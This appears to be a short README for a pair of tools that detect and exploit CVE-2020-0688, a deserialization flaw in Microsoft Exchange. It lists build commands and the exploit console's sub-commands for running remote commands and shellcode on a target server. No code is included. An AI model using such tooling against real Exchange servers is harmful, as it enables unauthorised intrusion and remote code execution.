Exploit and detect tools for CVE-2020-0688(Microsoft Exchange default MachineKeySection deserialize vulnerability)
build
csc ExchangeCmd.cs
csc ExchangeDetect.cs
usage
ExchangeDetect <target> <user> <pass>
ExchangeCmd <target> <user> <pass>
sub commands:
exec <cmd> [args]
exec command
arch
get remote process architecture(for shellcode)
shellcode <shellcode.bin>
run shellcode
exit
exit program
for more information, read writeup.pdf(in chinese).